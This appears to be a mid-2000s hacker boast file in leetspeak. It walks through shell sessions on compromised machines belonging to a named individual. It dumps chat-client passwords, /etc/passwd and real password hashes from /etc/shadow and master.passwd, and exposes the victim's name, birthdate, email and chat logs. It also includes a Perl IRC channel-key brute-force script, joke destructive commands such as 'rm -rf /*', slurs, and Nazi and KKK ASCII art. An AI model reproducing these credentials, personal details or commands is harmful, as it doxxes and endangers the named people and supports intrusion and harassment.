iji iji iji iji iSWMNMNMNMHJi iji iji iji iji iji ij
iji iji iji iji6WMNMNMNMNYiji iji Jci iji iji iji ij
iji iji iji i5WMNMNMNMN5iji iji JHMNSciji iji iji ij
iji iji iji5NMNMNMNMW5iji iji JHMNMNMWSji iji iji ij
iji iji ijcXMNMNMNMNNYiji ijtKMNMNMNMNMW6 iji iji ij
iji iji iji jDMNMNMN.-----------.MNMNMNMNMW5i iji ij
iji itciji iji QWEEW| Trollkore |NMQWMNMNMNMN5iji ij
ijitKMWSiji iji jQMN|- - - - - -|QtijSWMNMNMNMNYi ij
itQMNMNMW6iji iji tK| The *new* |tii icSMNMNMNMNHJij
iJHMNMNMNMW6iji ijcS| regime! |iji ijicXMNMNMNN5ij
ijiYNMNMNMNMN5i iSWM'___________' ciji ijicDMNW6i ij
iji i5NMNMNMNMNSWMNMMNMNHNMNMNMNMNXciji iji5i iji ij
iji iji5WMNMNMNMNMMNMNN5ij5NMNMNMNMNScjji iji iji ij
iji iji i6WMNMNMMNMNW5iji ij6WMNMNMNMWSji iji iji ij
iji iji ijiSWMMNMNW6iji iji tKMNMNMNMNXci iji iji ij
iji iji iji cSMNWSiji iji tQMNMNMNMNDjiji iji iji ij
iji iji ij iji c6ciji iji QMNMNMNMNQi iji iji iji ij
iji iji iji iji iji ijjDMNMNMNMNQtiji iji iji iji ij
iji iji iji iji iji ijXMNMNMNMNKt iji iji iji iji ij
iji iji iji iji iji jQMNMNMNHJiji iji iji iji iji ij
iji iji iji iji iji iji tKMNHJiji iji iji iji iji ij
iji iji iji iji iji iji tYiji iji iji iji iji iji ij
^
--- H0LLY SH1T 0WLNAZ1!^@$!^@$
owlmanatt@bell:/home/owlmanatt/stuff$ cd ..
owlmanatt@bell:/home/owlmanatt$ ls php/nixsec <--- N1XS3C TH0S3 F4GG0TZ SUQ%#^$
layout.html layout.html~ style.css style.css~
owlmanatt@bell:/home/owlmanatt$ ls kato
aim config jabber msn xchatlogs
owlmanatt@bell:/home/owlmanatt$ cd docs
owlmanatt@bell:/home/owlmanatt/docs$ cd ..
owlmanatt@bell:/home/owlmanatt$ cd classified <-- TH1Z MUZT B3 M0R3 CH1LD P0RN. Y0U S1Q FUQ
owlmanatt@bell:/home/owlmanatt/classified$ ls files
artofshellcode.txt ctorn.htm google.txt packets.txt rootkits.txt weaklogins.txt
attackplanning.txt dos.htm ha-howto.html pgp.txt sam.txt win32asm.txt
basiccrypto.txt dos.txt hidetracks-win2k.txt pgpencryption.htm server.txt win32bo.txt
bof-forkidz.txt ebook-C.zip iis4.txt php.txt shellaccounts.txt wingate.txt
box ebook-Perl5.zip ipspoofing.txt prepare_to_attack.doc smashingthestack.txt winrpc.txt
bufferow.txt exploitscripts.txt linux.txt pythonprog.htm unixpw.txt
c.txt forgeemail.txt monitordiff.txt readshcode.txt usesofroot.txt
^--- H4CK3R T3XTF1L3Z. W4TCH 0UT W0RLD, H3R3 0WL C0M3Z!!!!!
owlmanatt@bell:/home/owlmanatt/classified$ ls eclog
DEBIAN log.tar.gz
owlmanatt@bell:/home/owlmanatt/classified$ ls logs
AIM IRC MSN YAHOO aim jabber msn oldlog system
^--- D1DNT 3V3N N33D T0 SN1FF TH1Z B0X H0H0H0H0
owlmanatt@bell:/home/owlmanatt/classified$ cd ../.gaim
owlmanatt@bell:/home/owlmanatt/.gaim$ ls
accels accounts.xml accounts.xml~ blist.xml blist.xml~ icons logs pounces.xml prefs.xml smileys status.xml
owlmanatt@bell:/home/owlmanatt/.gaim$ grep "pass" accounts*
accounts.xml: <password>owldsl</password>
accounts.xml: <password>owltpo</password>
accounts.xml: <password>owldsl</password>
accounts.xml: <password>owldsl</password>
accounts.xml: <password>owltpo</password>
accounts.xml: <password>owltpo</password>
accounts.xml: <password>owlowl</password>
accounts.xml: <password>owltpo</password>
accounts.xml: <password>owltpo</password>
accounts.xml: <password>owltpo</password>
accounts.xml~: <password>owltpo</password>
accounts.xml~: <password>owltpo</password>
accounts.xml~: <password>owltpo</password>
accounts.xml~: <password>owltpo</password>
owlmanatt@bell:/home/owlmanatt/.gaim$ grep "user" accounts*
accounts.xml: <userinfo><vCard prodid='-//HandGen//NONSGML vGen v1.0//EN' version='2.0' xmlns='vcard-temp'><FN>Nicholas Evans</FN><NICKNAME>OwlManAtt</NICKNAME><URL>http://owlmanatt.com</URL><ADR><REGION>New England</REGION><COUNTRY>US of A</COUNTRY></ADR><EMAIL>OwlManAtt@OwlManAtt.com</EMAIL><BDAY>1989.12.20</BDAY></vCard></userinfo>
owlmanatt@bell:/home/owlmanatt/.gaim$ cd ..
WH0 1Z 0N TH1Z L4M3 SKUMB4G'Z B0X?
owlmanatt@bell:/home/owlmanatt/.gaim$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
postfix:x:100:103::/var/spool/postfix:/bin/false
syslog:x:105:105::/home/syslog:/bin/false
klog:x:106:106::/home/klog:/bin/false
owlmanatt:x:1000:1000:Nicholas Evans,,,:/home/owlmanatt:/bin/bash
messagebus:x:101:110::/var/run/dbus:/bin/false
cupsys:x:102:107::/:/bin/false
fetchmail:x:103:65534::/var/run/fetchmail:/bin/sh
hal:x:111:111:Hardware abstraction layer,,,:/var/run/hal:/bin/false
saned:x:113:113::/home/saned:/bin/false
gdm:x:104:114:Gnome Display Manager:/var/lib/gdm:/bin/false
sshd:x:107:65534::/var/run/sshd:/bin/false
steve:x:1001:100::/home/steve:/bin/bash
debian-tor:x:115:115::/var/lib/tor:/bin/bash
cvsd:x:108:116:cvs pserver daemon:/var/lib/cvsd:/bin/false
dhcp:x:117:117::/nonexistent:/bin/false
hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false
owlmanatt@bell:/home/owlmanatt/.ssh$ sudo su
sudo: pam_authenticate: Module is unknown
owlmanatt@bell:/home/owlmanatt/.gaim$ cd ..
owlmanatt@bell:/home/owlmanatt$ cat hello.c
#define NAME hello.c
#define DESCRIP many languages at once (tcl, perl 4 & 5, sh, C)
#define AUTHOR ****** ********
#define DATE 7/31/96
#define dummy \
eval qq[qq? 2> /dev/null
#if 0
#\
echo 'Hello world!'; exit 0 # shell part
puts "Hello world!"; exit 0
#endif
/* C part */
#include <stdio.h>
int main(void)
{
printf ("Hello world!\n");
return 0;
}
#define dummy2(perl) \
?]; print "Hello world!\n"; exit 0 # perl part
fuck1ng l33t
Last login: Sat Oct 22 20:59:52 2005 from bell
OpenBSD 3.7 (GENERIC) #431: Sun Mar 20 14:10:02 MST 2005
=========================================
= _____ ___ ____ ____ _____ ____ ____ =
=|_ _|_ _/ ___| _ \| ____/ ___/ ___| =
= | | | | | _| |_) | _| \___ \___ \ =
= | | | | |_| | _ <| |___ ___) |__) |=
= |_| |___\____|_| \_\_____|____/____/ =
=========================================
=========================================
=== RULES (4ND L4CK TH3R3 0F) ===
=========================================
* No child pornography.
^
----w3 f0unD pl3nTy 0f Th1z!!
* No haxx0ring/f0rkb0mbs/lameness.
* That fucking means you, uber.
^
---- w3 4ll Kn0w n13th3r yu0 0r y0ur Fr13ndz h4xx0r
* No bandwidth/CPU whoring.
^
--- s0rrY ab0u7 th@ T1M3 W3 Dd0z3d 3fn3t :(
* Don't get the fucking hostmask
banned on EFNet.
^
---- <h0no> kn0wFx yu0 fUck1ng Suq!
^- h0no has quit (klined)
* Refrain from unauthorized port
scanning.
^
--- nmap fbi.gov; cat /dev/urandom|telnet fbi.gov 80
* Respect other people's code,
databases, and projects.
^
---- # rm -rf /*
* NO MOTHERFUCKING EMO SPACESHIPS.
^
-- Wh4t th3 fUq@@!@
* Do not abuse tor.
^
---- t0r 1z f0r h1pp13z
* Canal and NukuNuku do not have to
follow these rules.
^
--- 4n4l FuKK4 wh4t th3 FuQ!#@
IF YOU DO SOMETHING FUCKING LAME, I CANNOT
BE HELD RESPONSIBLE. THIS SERVICE COMES
WITHOUT FUCKING GUARANTEES. I WILL CUT YOU
SHIT OFF IF I FEEL LIKE IT, AND HAVE NO
LEGAL RESPONSIBILITY TO GIVE YOU ANY SORT
OF GODDAMNED COMPENSATION.
^
--- t00 b4d y0u fuqn l4m3r. h0no d3m4ndz 0d4y t4x!@#$
--- g1v3 up y0ur 0d4yz!@# n0w!@#!@#!@#!
# uname -a;id
OpenBSD tigress.gateway.2wire.net 3.7 GENERIC#431 sparc64 ------- 0p3nbsD 1z n0 m4tCh f0r h0noz 0hd4y k3rn3l bUgZ h3h3
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# ls -al /home/*
/home/mfqr:
total 22644
drwxr-xr-x 5 mfqr mfqr 512 Nov 11 20:28 .
drwxr-xr-x 4 root wheel 512 Oct 29 21:47 ..
lrwxr-xr-x 1 mfqr mfqr 9 Oct 30 03:03 .bash_history -> /dev/null
-rw-r--r-- 1 mfqr mfqr 179 Oct 30 03:03 .bash_login
-rw------- 1 mfqr mfqr 5108 Nov 11 20:28 .viminfo
-rw-r--r-- 1 mfqr mfqr 17 Oct 29 21:47 .vimrc
-rw-r--r-- 1 mfqr mfqr 54 Nov 11 20:27 blib.pm
drwxr-xr-x 3 mfqr mfqr 512 Oct 29 22:00 echoghost
-rw-r--r-- 1 mfqr mfqr 11 Oct 29 22:03 mfqr
drwx------ 7 500 500 1024 Oct 30 05:38 silc-client-1.0.2
-rwx------ 1 root mfqr 11540480 Apr 6 2005 silc-client-1.0.2.tar
drwxrwxrwx 6 mfqr mfqr 1024 Oct 30 04:48 silklol
-rw-r--r-- 1 mfqr mfqr 68 Nov 11 20:28 test.pl
/home/owlmanatt:
total 36
drwxr-xr-x 3 owlmanatt owlmanatt 512 Nov 26 14:26 .
drwxr-xr-x 4 root wheel 512 Oct 29 21:47 ..
-rw------- 1 owlmanatt owlmanatt 1852 Nov 26 14:51 .bash_history
-rw-r--r-- 1 owlmanatt owlmanatt 195 Oct 22 21:27 .bash_login
-rw------- 1 owlmanatt owlmanatt 4767 Oct 23 17:48 .viminfo
-rw-r--r-- 1 owlmanatt owlmanatt 17 Oct 22 21:31 .vimrc
drwxr-xr-x 2 owlmanatt owlmanatt 512 Jan 19 2003 dnet
# grep -v '*' /etc/master.passwd
root:$2a$08$3UzrCUGu/VbJb170f67aYuujaOXjG..YRG9a7jzEI1b/FyCRchG7a:0:0:daemon:0:0:Charlie &:/root:/bin/csh
owlmanatt:$2a$06$X0i41Tkrz6Z5hgyJbrf1.ecYPtpAFfQJGVKigV9db3bCG.RcsIVLu:1000:1000::0:0:Nicholas Evans:/home/owlmanatt:/usr/local/bin/bash
mfqr:$2a$06$Rn3ciKRc5KTLK4N/UjO.LuYk/0JG10bEQhGCD3l06mfUGoqXEUCbW:1001:1001::0:0:Vile:/home/mfqr:/usr/local/bin/bash
Th1Z b0X h4z n0th1nG. 0n t0 th3 n3x7 0n3%#$%##
owlmanatt@bell:/home/owlmanatt$ ssh kato
Linux kato 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux
==============================
== _ __ _ _____ ___ ==
== | |/ / / \|_ _/ _ \ ==
== | ' / / _ \ | || | | | ==
== | . \ / ___ \| || |_| | ==
== |_|\_\/_/ \_\_| \___/ ==
==============================
== RULES ==
==============================
* No child pornography.
^-~-~-~ /home/owlmanatt/secret/
* No haxx0ring/f0rkb0mbs/lameness.
* That fucking means you, uber.
^-~-~-~ ./h0no-0bsd-3xpl0i7 -h openbsd.org
* No bandwidth/CPU whoring.
^-~-~-~ <h0no> th1z b0x 1z undd0z4bl3 juz7 7ry 1T
*h0no has quit (ping timeout)*
* Don't get the fucking hostmask
banned on EFNet.
^-~-~-~ alr3adY d1d :/
* Refrain from unauthorized port
scanning.
^-~-~-~ nmap 5up3r fuq1n s3cr3t pl4c3
* Respect other people's code,
databases, and projects.
^-~-~-~ rm -rf /home/*
* NO MOTHERFUCKING EMO SPACESHIPS.
^-~-~-~ 3y3 st1ll d0 n0t kn0w wh4t th1z 1z
* Do not abuse tor.
^-~-~-~ t0r 1z n0t 0n th1z b0x f00l.
* Canal and NukuNuku do not have to
follow these rules.
^-~-~-~ m0re 4n4l fUq1nG!@?!@?
IF YOU DO SOMETHING FUCKING LAME, I CANNOT
BE HELD RESPONSIBLE. THIS SERVICE COMES
WITHOUT FUCKING GUARANTEES. I WILL CUT YOU
SHIT OFF IF I FEEL LIKE IT, AND HAVE NO
LEGAL RESPONSIBILITY TO GIVE YOU ANY SORT
OF GODDAMNED COMPENSATION.
^-~-~-~ b1g t0ugh 0wlm4n t4lk1ng b1g#@$%!*
Last update: 2005-10-08 13:44
Have fun.
You have new mail.
Last login: Thu Dec 1 09:08:07 2005 from bell
owlmanatt@kato:~$ uname -a
Linux kato 2.6.12-10-386 #1 Fri Nov 18 11:51:02 UTC 2005 i686 GNU/Linux ThanKZ SD!@@
owlmanatt@kato:~$ id
uid=1000(owlmanatt) gid=1000(owlmanatt) groups=109(admin),1000(owlmanatt),1004(webdev),1005(webdev-adm)
owlmanatt@kato:~$ sudo su
Password:
root@kato:/home/owlmanatt # id
uid=0(root) gid=0(root) groups=0(root)
root@kato:/home/owlmanatt # ls -al /home/
total 3043628
drwxr-xr-x 10 root root 4096 2005-11-24 10:28 .
drwxr-xr-x 21 root root 4096 2005-11-24 14:17 ..
-rw-r--r-- 1 root root 3113538985 2005-11-24 10:47 complete-backup_20051124102800.tar.gz
drwxr-xr-x 3 ell1sk ell1sk 4096 2005-08-17 02:25 ell1sk
drwx--x--x 5 fac51 fac51 4096 2005-11-19 13:30 fac51
drwx--x--x 11 infinityb infinityb 4096 2005-11-16 18:37 infinityb
drwxr-xr-x 2 root root 49152 2005-08-16 16:22 lost+found
drwx--x--x 21 owlmanatt owlmanatt 4096 2005-11-29 22:43 owlmanatt
drw------- 5 owlmanatt staff 4096 2005-10-26 17:17 pasv
drwx--x--x 4 trevor trevor 4096 2005-09-05 15:27 trevor
drwx--x--x 17 uberuser uberuser 4096 2005-11-26 03:27 uberuser
^
--- 4ll th3z3 fuckz ar3 l0z3rz
root@kato:/home/owlmanatt # ls -al /home/owlmanatt
/home/owlmanatt:
total 3032
drwx--x--x 21 owlmanatt owlmanatt 4096 2005-11-29 22:43 .
drwxr-xr-x 10 root root 4096 2005-11-24 10:28 ..
-rw-r--r-- 1 owlmanatt owlmanatt 18436 2005-09-21 18:44 2005-09-17_lab-procedure.abw
-rw-r--r-- 1 owlmanatt owlmanatt 44 2005-10-30 21:49 AI.php
-rw------- 1 root root 6442 2005-11-22 06:27 .bash_history
-rw-r--r-- 1 owlmanatt owlmanatt 414 2005-08-16 16:32 .bash_profile
-rw-r--r-- 1 owlmanatt owlmanatt 2114 2005-09-26 23:21 .bashrc
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-19 23:49 book_parse
-rw-r--r-- 1 owlmanatt owlmanatt 8 2005-10-09 18:25 breifcase.combo
drwxr-xr-x 3 root root 4096 2005-08-22 15:43 .cpan
-rw------- 1 root root 61 2005-11-21 22:20 .cvspass
-rw-r--r-- 1 owlmanatt owlmanatt 2324955 2005-11-24 10:24 database_backup.sql
-rw-r--r-- 1 owlmanatt owlmanatt 479 2005-09-18 10:56 db.owlmanatt
drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-11-26 13:52 dnet
drwx------ 2 owlmanatt owlmanatt 4096 2005-10-19 00:05 .elinks
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-10-02 12:37 gparse
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-23 19:43 horde_tar
-rwx------ 1 owlmanatt owlmanatt 121 2005-09-17 09:29 ipcheck.bsh
-rw-r--r-- 1 owlmanatt owlmanatt 33 2005-11-11 12:59 ipcheck.dat
-rw-r--r-- 1 owlmanatt owlmanatt 52 2005-09-10 22:59 ipcheck.err
-rw-r--r-- 1 owlmanatt owlmanatt 18 2005-11-11 12:59 ipcheck.html
-rw-r--r-- 1 owlmanatt owlmanatt 835 2005-12-01 17:00 ipcheck.log
-rwxr-xr-x 1 owlmanatt owlmanatt 171842 2005-08-14 23:03 ipcheck.py
drwx------ 2 owlmanatt owlmanatt 4096 2005-11-24 18:30 .irssi
-rw-r--r-- 1 owlmanatt owlmanatt 391982 2005-11-12 16:32 mindwar.abw
-rw------- 1 root root 162 2005-08-16 22:31 .mysql_history
drwx------ 3 owlmanatt owlmanatt 4096 2005-08-17 21:54 .naimlog
drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-09-13 21:47 nuku
-rw-r--r-- 1 owlmanatt owlmanatt 1697 2005-09-05 18:22 NukuNukuP_1125958924.tar.bz2
drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-08-22 20:07 OwlInfo
-rw-r--r-- 1 root root 59 2005-08-18 20:22 .pearrc
drwxr-xr-x 4 owlmanatt owlmanatt 4096 2005-10-29 10:54 project_docs
drwxr-xr-x 19 owlmanatt owlmanatt 4096 2005-11-20 08:40 public_html
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-18 22:04 ruby_2005-11-18
-rw-r--r-- 1 owlmanatt owlmanatt 165 2005-08-18 08:13 .screenrc
-rw-r--r-- 1 owlmanatt owlmanatt 46 2005-11-25 13:44 songs.txt
drwx------ 2 owlmanatt owlmanatt 4096 2005-10-14 15:09 .ssh
drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-08-22 20:03 .subversion
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-10-26 17:46 sysadmin_scripts
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-24 23:24 tmp
drwxr-xr-x 3 owlmanatt owlmanatt 4096 2005-10-21 21:41 tmpdit
-rw------- 1 owlmanatt owlmanatt 9757 2005-11-29 22:43 .viminfo
-rw-r--r-- 1 owlmanatt owlmanatt 43 2005-11-18 20:34 .vimrc
-rw-r--r-- 1 owlmanatt owlmanatt 105 2005-12-01 17:00 webip.out
drwxr-xr-x 2 owlmanatt owlmanatt 4096 2005-11-24 23:26 yasashii
root@kato:/home # cd fac51
root@kato:/home/fac51 # cd irclogs/
root@kato:/home/fac51/irclogs # ls -al
total 16
drwxr-xr-x 4 fac51 fac51 4096 2005-10-09 14:18 .
drwx--x--x 5 fac51 fac51 4096 2005-11-19 13:30 ..
drwxr-xr-x 2 fac51 fac51 4096 2005-11-29 15:18 DogicDesign
drwxr-xr-x 2 fac51 fac51 4096 2005-11-19 13:49 EFNet
^--- n0 n33d t0 sn1ff h0h0
root@kato:/home/fac51/irclogs # cd /home/pasv
root@kato:/home/pasv # cat test.c
#include <stdio.h>
#include <stdlib.h>
int main (int argc, char **argv) {
FILE *fp;
char *file;
if((fp=fopen("/home/pasv/.m", "w+")) =< 0) {
perror("fopen");
exit(1);
}
file = memset(malloc(1000),0,1000); <--- 0h fuCk m4ll0c!@!@? y0u w1ll b3 th3 n3xt Scut w1f th3s3 sk1llz
}
root@kato:/home/pasv # cd ..
root@kato:/home # cd uberuser
root@kato:/home/uberuser # ls ASKUBIE
AskUbie Intelligent IRC Bot.doc dictionary likelog.log realnames.txt version.list
AskUbie IRC bot (objects, classes, layout).doc dictionary.bkp masters.list responses.log
botnicks.list doc nicks.list The Askubie IRC bot PLAN.doc
Channel.pm greetings.txt PSUEDO_CODE topic.list
compliments.txt insults.txt Quotes urls.list
^--- 0H SH1T!@# W4TCH 0UT F0R 4SKUB13!@#$%!!@
root@kato:/home/uberuser # ls public_html/misc/NIXSEC/*
public_html/misc/NIXSEC/code:
backdoor cisco-leaked exploit other practice security shellcode
^
--- H4H4H4 WH3N W1LL TH3Z3 L0Z3RZ G3T 0V3R N1XS3C?#@
--- 1T W4Z 0WN3D 4ND SK3W 1Z 1N H1D1NG@#$* SHUT TH3 FUQ UP 4B0UT N1XS3C
public_html/misc/NIXSEC/papers:
coding other security unix
root@kato:/home/uberuser # ls public_html/misc/NIXSEC/cisco-leaked/
ls: public_html/misc/NIXSEC/cisco-leaked/: No such file or directory
^--- 0BV10UZLY TH3Y D0NT H4V3 SH1T
root@kato:/home/uberuser # cd public_html/misc/NIXSEC
root@kato:/home/uberuser/public_html/misc/NIXSEC # ls
code papers
^--- N0 C0D3
root@kato:/home/uberuser/public_html/misc/NIXSEC # cd code/cisco-leaked
root@kato:/home/uberuser/public_html/misc/NIXSEC/code/cisco-leaked # ls
root@kato:/home/uberuser/public_html/misc/NIXSEC/code/cisco-leaked # cd ..
root@kato:/home/uberuser/public_html/misc/NIXSEC/code # ls *
backdoor:
cisco-leaked: - wh4t w0uld y0u d0 w1th 1t 4nyw4y? t3ll p3opl3 yu0 h4v3 1t t0 s0und l33t?
exploit: - n0th1ng ju5t az 3xp3ct3d...
other:
practice:
bof challenges fmtstring heap symlink
security: - 4h4h4h4h4 n1xs3c? s3cur1Ty?!@?!@
shellcode: - th3s3 l4m3rs d0nt kn0w ay ess em!
root@kato:/home/uberuser/public_html/misc/NIXSEC/code # cd ..
root@kato:/home/uberuser/public_html/misc/NIXSEC # ls
code papers
root@kato:/home/uberuser/public_html/misc/NIXSEC # ls papers/*
papers/coding:
papers/other:
papers/security:
papers/unix:
root@kato:/home/uberuser/public_html/misc/NIXSEC # cd ..
root@kato:/home/uberuser/public_html/misc # cd ..
root@kato:/home/uberuser/public_html # cd ../..
root@kato:/home # cd uberuser
root@kato:/home/uberuser # cat kkkfile
/|
/ |
/ |
/ \
/ |
/ \
/______ |
_ _ _ /|@/@ \_\__\
\ \\ ///<__ / \ \\
\_ // \\_\|/ \___\\_
\ ______ // __/\__/ / \_
/'-.____\____||/ \/ \_
| <|/\_\\ \ \ \ \
_/ \\_\-\ | \ / \ \__ |
___/ \/_____/| \ \_| |
\ / | |
|\ \ |____|
\ \ / / |
|\ \ \`///
/ / \
/ . \
/ . \
/ / \_
/_/ _\
| \ | /
| \_____| / \
| | \____________/ \
Ascii by |__ | \ \
Latuff98 ___/____| __\ _|
L____ __| L____/`
KKK:THE SHAME OF AMERICA
<< wh4t th3 fucK 1z 1t w1tH th3s3 l4m3rz!@? >>
root@kato:/home/uberuser # cat chancrack.pl <--- 0h fuQ 1 f0unD th3 j4qp0t@#&*!@*&^*!#% #el8 c4n7 st0p uz n0w!!!!
#!/usr/bin/perl -w
use Net::IRC;
use Net::IRC::Event;
#open(WL, "/home/uberuser/wordlist") or die "Failed to open
#wordlist$!\n";
# @keys = <WL>;
# chomp(@keys);
# close(WL);
$irc = new Net::IRC;
$conn = $irc->newconn(Nick => 'LEECHAXSS',
Server => 'irc.servercentral.net',
Port => 6667,
Username => "iheartu",
Ircname => 'I LOVE CRAXING DOT IN');
$chan = "#pokemon";
sub on_connect {
($self) = shift;
$self->join("#seele");
$stime = `date +\"%b/%d/%Y %H:%M:%S\"`;
foreach $chankey (`cat wordlist`) {
print "TRYING: $chankey\n";
$self->join("$chan", "$chankey");
sleep(2);
}
}
sub on_names {
$endtime = `date +\"%b/%d/%Y %H:%M:%S\"`;
$self->privmsg("#seele", "uberuser: $chan key: $chankey");
$self->privmsg("uberuser", "$chan key: $chankey");
$self->quit("I LOL'd");
print "START TIME: $stime\nEND TIME: $endtime\n";
print "$chan KEY: $chankey\n";
}
#$conn->add_handler('msg', \&on_msg);
#$conn->add_handler('mode', \&on_mode);
$conn->add_global_handler('376', \&on_connect);
$conn->add_global_handler(353, \&on_names);
$irc->start;
root@kato:/home/uberuser # cat nazifile2
_______________________________________________________________________________________
/ /\
/ U N S E R E E H R E / /___
/______________________________________________________________________________________/ / /\
\ \ \ / \
\ H E I S S T \ \/ /\ \
___\______________________________________________________________________________________\ /__\/
/______________________________________________________________________________________/\ / \
\ \ \/ /\ \
\ T R E U E \ /__\ \
\______________________________________________________________________________________\/ / /
/______________________________________________________________________________________/ /
\______________________________________________________________________________________\/
WH47 TH3 FUQ!!!!!!!!!!!!! FUCK1NG N4Z1'S
root@kato:/home/uberuser # exit
exit
owlmanatt@kato:~$ sudo su
Password:
root@kato:/home/owlmanatt # cat /etc/shadow
root:*:13012:0:99999:7:::
daemon:*:13011:0:99999:7:::
bin:*:13011:0:99999:7:::
sys:*:13011:0:99999:7:::
sync:*:13011:0:99999:7:::
games:*:13011:0:99999:7:::
man:*:13011:0:99999:7:::
lp:*:13011:0:99999:7:::
mail:*:13011:0:99999:7:::
news:*:13011:0:99999:7:::
uucp:*:13011:0:99999:7:::
proxy:*:13011:0:99999:7:::
www-data:*:13011:0:99999:7:::
backup:*:13011:0:99999:7:::
list:*:13011:0:99999:7:::
irc:*:13011:0:99999:7:::
gnats:*:13011:0:99999:7:::
nobody:*:13011:0:99999:7:::
postfix:!:13011:0:99999:7:::
syslog:!:13011:0:99999:7:::
klog:!:13011:0:99999:7:::
owlmanatt:$1$HACZyNrK$lqBiNHo7fs.mawfKimlUP1:13011:0:99999:7:::
sshd:!:13012:0:99999:7:::
mysql:!:13012:0:99999:7:::
Debian-exim:!:13012:0:99999:7:::
infinityb:$1$2EWAQAn6$KFwYSiQydMi1n5SjHs8iF0:13012:0:99999:7:::
uberuser:$1$ohfno5Nu$.gNDX.jA0CgNImpGJG6S2/:13012:0:99999:7:::
ell1sk:$1$08Y.eng7$llGyt66tvlefIiHobgwz//:13012:0:99999:7:::
trevor:$1$twekn5m1$5XeCPTDYhMD.Pv2RYMcUR1:13031:0:99999:7:::
pasv:!$1$8aDyAgPT$CNJZz2eULRRSlFc5oxoO01:13053:0:99999:7:::
debian-tor:!:13064:0:99999:7:::
fac51:$1$615IhWKx$IjxKVX9Ek0K4J3Oq7b.Nr0:13065:0:99999:7:::
bitlbee:!:13087:0:99999:7:::
dhcp:!:13111:0:99999:7:::
root@kato:/home/owlmanatt #
th1z b0x 1z fuck1ng l4m3 y0u n4z1 fuckz.
n0w f0r 0wlm4n4tt.c0m#!!@#!@
owlmanatt@bell:/home/owlmanatt$ ssh evansn@owlmanatt.com
Linux enterprise 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 30 18:25:38 2005 from 64.252.161.82
evansn@enterprise:~$ uname -a;id
Linux enterprise 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
uid=1004(evansn) gid=1004(evansn) groups=1004(evansn)
evansn@enterprise:~$ w
18:27:33 up 42 days, 7:23, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
evansn pts/0 64.252.161.82 18:26 0.00s 0.02s 0.00s w
evansn@enterprise:~$ ls -al /home
total 22
drwxrwsr-x 10 root staff 1024 2005-07-18 20:39 .
drwxr-xr-x 22 root root 1024 2005-05-11 18:48 ..
drwxr-xr-x 29 domorods users 2048 2005-11-27 12:25 domorods
drwxr-xr-x 4 evansn evansn 1024 2005-11-30 18:49 evansn
drwxr--r-- 3 ftp fax 1024 2004-12-14 09:44 ftp
drwxr-xr-x 5 81 81 1024 2004-01-13 22:46 httpd
drwx------ 4 john john 1024 2005-11-29 07:09 john
drwx------ 2 root root 12288 2003-07-02 20:50 lost+found
drwx--x--x 5 melkore users 1024 2004-09-14 00:03 melkore
drwxr-xr-x 9 vmail vmail 1024 2005-08-09 07:25 vmail
evansn@enterprise:~$ ls -al
total 1375
drwxr-xr-x 4 evansn evansn 1024 2005-11-30 18:49 .
drwxrwsr-x 10 root staff 1024 2005-07-18 20:39 ..
-rw------- 1 evansn evansn 5442 2005-11-30 18:58 .bash_history
-rw-r--r-- 1 evansn evansn 414 2005-07-18 20:39 .bash_profile
-rw-r--r-- 1 evansn evansn 2044 2005-07-18 20:39 .bashrc
drwxr-xr-x 2 evansn evansn 1024 2005-09-18 09:56 MT-3.2-en_US
-rw-r--r-- 1 evansn evansn 1377924 2005-09-18 09:49 MT-3.2.tar.gz
-rw------- 1 evansn evansn 613 2005-11-30 18:41 .mysql_history
lrwxrwxrwx 1 evansn evansn 28 2005-07-18 20:58 owlmanatt -> /u0/www/customers/owlmanatt/
drwx------ 2 evansn evansn 1024 2005-07-18 20:44 .ssh
-rw------- 1 evansn evansn 7410 2005-11-30 18:49 .viminfo
evansn@enterprise:~$
wh4t 4 fuck1ng l4m3 b0x. 1t f1tz 0wlm4n th0ugh.
t0 t0p 1t 0ff h0w 4b0ut s0m3 l0gz 0f 0wlm4n 4nd sk3w t4lk1ng!@!@*@!
Conversation with unixroot102 at 2004-11-28 17:32:36 on OwlManAttTFC (aim)
(17:32:36) unixroot102: owl
(17:32:41) unixroot102: u there?
(17:32:51) OwlManAttTFC: Possibly.
(17:32:59) unixroot102: JEsus.
(17:33:03) unixroot102: its you?
(17:33:21) OwlManAttTFC: No, it's a trained monkey in an infinityb suit.
